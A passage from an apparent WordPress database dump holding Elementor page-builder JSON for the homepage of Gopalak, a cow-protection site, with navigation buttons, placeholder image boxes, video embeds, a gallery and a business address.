us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0300\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10070,1684,'_elementor_page_assets','a:0:{}'),(10072,1685,'_elementor_edit_mode','builder'),(10073,1685,'_elementor_template_type','wp-page'),(10074,1685,'_elementor_version','3.7.8'),(10075,1685,'_wp_page_template','elementor_canvas'),(10076,1685,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0300\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 